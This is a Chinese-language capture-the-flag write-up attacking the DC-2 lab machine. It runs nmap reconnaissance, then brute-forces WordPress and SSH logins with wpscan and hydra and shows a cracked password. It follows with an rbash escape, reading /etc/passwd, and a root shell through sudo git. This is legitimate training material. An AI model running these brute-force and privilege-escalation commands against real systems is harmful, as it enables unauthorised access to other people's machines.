靶机DC-2攻防

实验环境：
网段：192.168.0.0/24
kali ip：192.168.0.108
dc-2 mac：00:0c:29:d7:c4:e8

0x01信息收集

使用netdicover查找 dc-2 ip

netdiscover -i eth0 -r 192.168.0.0/24 # i 指定网卡 r 指定网段

结果如下

netdiscover结果

dc-2 ip：192.168.0.131
使用nmap进行全面扫描

nmap -A -p- 192.168.0.131 

扫描结果如下

nmap扫描结果

开放80端口-http
开放7744端口-ssh

0x02 漏洞挖掘

尝试登录网站，发现自动解析

网站自动解析

需要在本地添加dns解析才能访问，解析地址配置文件 /etc/hosts

本地添加dns解析

正常访问

拿到flag1

flag1

flag1提示：要用到cewl工具 尝试账密爆破
cewl工具：主动爬行网站目录，将网站中的单词组成字典文件

cewl dc-2 > passwd.dic #将在dc-2爬行到的单词组成字典保存到passwd.dic

使用nikto扫描网站敏感目录文件

nikto --url http://dc-2

发现登录php

登录页面

没有验证码可尝试爆破

登录页面

有很多方式可以直接爆破用户名，并且根据flag1的提示我们已经做了密码字典passwd.dic,对于wordpass有一款专用的扫描软件wpscan

wpscan --url http://dc-2 -e vp,u --plugins-detection mixed 
# e枚举/ vp含有漏洞插件/ u用户名/ plugins-detection方式/ mixed混合模式

wpscan扫描结果，加入用户名字典，进行账密爆破

扫描结果

进行账密的暴力破解，暴力破解的方法有很多，这里用到的是wpscan的暴力破解

wpscan --url http://dc-2 -U users.dic -P passwd.dic

爆破成功

登录 jerry用户，拿到flag2

flag2

flag2提示：wordpress是不能用了，尝试一下其他方法
在信息收集阶段我们还收集到7744开放ssh服务 ，尝试用hydra爆破

hydra -L users.dic -P passwd.dic ssh://dc-2 -t 64 -f -s 7744

爆破成功
host: dc-2 login: tom password: parturient

破过结果

登录 ：

ssh tom@dc-2 -p 7744

存在rbash限制

rbash

rbash绕过

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

拿到flag3

flag3

flag3提示：tom和jerry之间的联系,并且还提到了 su 命令
关注两个文件 /etc/passwd /etc/shadow

tom@DC-2:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
tom:x:1001:1001:Tom Cat,,,:/home/tom:/bin/rbash
jerry:x:1002:1002:Jerry Mouse,,,:/home/jerry:/bin/bash

看一下jerry家目录/home/jerry
拿到flag4

tom@DC-2:/$ cd /home/jerry/
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

根据flag提示只能进行提权操作
sudo -l查看是否可以越权执行，可惜这里不能用

tom@DC-2:/home/jerry$ sudo -l
[sudo] password for tom: 
Sorry, user tom may not run sudo on DC-2.

根据flag3使用su命令切换jerry用户,执行sudo -l发现jerry用户可以用root权限执行git命令

tom@DC-2:/$ su - jerry
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

git -p可直接进入help信息交互模式，相当于man的命令行模式
0x03提权
利用git提权
sudo git help config > 末行模式：!/bin/bash
sudo git -p help > 末行模式：!/bin/bash

jerry@DC-2:/home/tom$ sudo git help config
root@DC-2:/home/tom# whoami
root
root@DC-2:/# cd /root/
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

提权成功，并在root用户家目录下拿到flag4！！